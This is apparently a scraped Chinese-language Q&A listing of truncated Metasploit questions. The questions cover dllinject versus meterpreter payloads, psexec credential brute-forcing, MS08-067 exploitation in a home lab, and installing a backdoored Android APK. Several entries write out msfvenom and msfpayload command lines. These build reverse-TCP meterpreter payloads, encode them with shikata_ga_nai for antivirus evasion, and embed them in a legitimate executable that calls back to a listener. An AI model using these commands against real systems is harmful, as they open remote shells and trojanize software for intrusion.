metasploit

    0熱度

    1回答

    我有一個關於metasploit中dllinject有效載荷的問題。 dllinject有效載荷和meterpreter載荷之間的注入方法有什麼區別? 技術是否一樣? (Reflective-Dll loading?) 因爲當我使用dllinject有效載荷時,我沒有在內存中看到反射式dll ... 有人知道嗎? 謝謝!

    0熱度

    2回答

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.99 LPORT=8080 -a x86 R |msfvenom -e -t exe -x minipad.exe -k -o minipad123.exe -e x86/shikata_ga_nai -c 8 Attempting to read payload from

    0熱度

    1回答

    基本上昨天晚上我成功地嘗試了我的本地網絡上的一些漏洞,不幸的是msfconsole不會在今天開始。我很感激,如果有人知道他的東西,這個回答我的問題。 錯誤我得到的是: /usr/bin/msfconsole 12: require: not found /usr/bin/msfconsole 18: Syntax error: "(" expected (expecting "then").

    0熱度

    1回答

    在利用系統後的meterpreter會話中,我想要在打開的meterpreter會話中編輯.txt文件。我用命令: meterpreter > edit mypasswords.txt 之後,它打開Vi編輯器進行編輯,但我真的不喜歡Vi編輯器。我想知道如果有一種將meterpreter的默認編輯器(Vi)更改爲Nano的方法。

    0熱度

    1回答

    我試圖創建Meterpreter就會/ reverse_tcp驛站,與UUID跟蹤,但〜/ .msf4/payloads.json不會創建。 這是msfvenom命令: msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_tcp LHOST=example.com LPORT=4444 PayloadUUIDTrack

    -3熱度

    1回答

    我目前正在使用安裝了Kali軟件的計算機和安裝了Windows 8的計算機進行筆測試。 我想通過Metasploit進行psexec_command攻擊。 是否有一種方法可以強制psexec的憑據?

    0熱度

    1回答

    對不起,我的英語。 使用metasploit我爲windows 7/windows/shell/reverse_tcp負載生成了漏洞利用。 後來我等待連接使用msfconsole: use exploit/multi/handler set PAYLOAD windows/shell/reverse_tcp set LHOST 192.168.182.129 set LPORT 4444

    1熱度

    1回答

    我有一個小型「實驗室」試圖在家裏pentesttest,我有我的主要操作系統和虛擬機我運行Windows XP SP3(ENG)。我使用ms08_067_netapi和reverse_tcp作爲有效載荷。當我使用exploit命令時,這就是我所得到的。 [*] Started reverse TCP handler on 192.168.1.69:4444 [*] Automatically d

    1熱度

    3回答

    我想在Android設備(GT-19300和SGS選項卡S 10.5)上安裝被黑客入侵的apk。 我的問題是,它不是安裝該apk既不在我的手機也不在我的選項卡上。它一直說,該應用程序無法安裝... 手機運行Android 4.3(rooted!)和 標籤運行Android 5.0.2。 我創建的Metasploit Pro的控制檯(窗)用下面的命令APK: 採用Android/Meterprete

    0熱度

    1回答

    在以前版本的Metasploit的,我們可以利用這個代碼生成多編碼的有效載荷生成多編碼有效載荷: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.217.133 LPORT=444 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdow